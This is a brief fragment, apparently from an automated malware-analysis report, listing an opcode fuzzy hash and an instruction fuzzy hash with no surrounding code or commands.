                                                                                                              • Opcode Fuzzy Hash: 8d80f9d66d64b7fb1912daafd3f8f4510d97bd4071ca09a118c80cf32e6910c5
                                                                                                              • Instruction Fuzzy Hash: 79418271D00258EFEF219F95D940A6EBBB8FF84714F00856AE915DB298D734E802EB61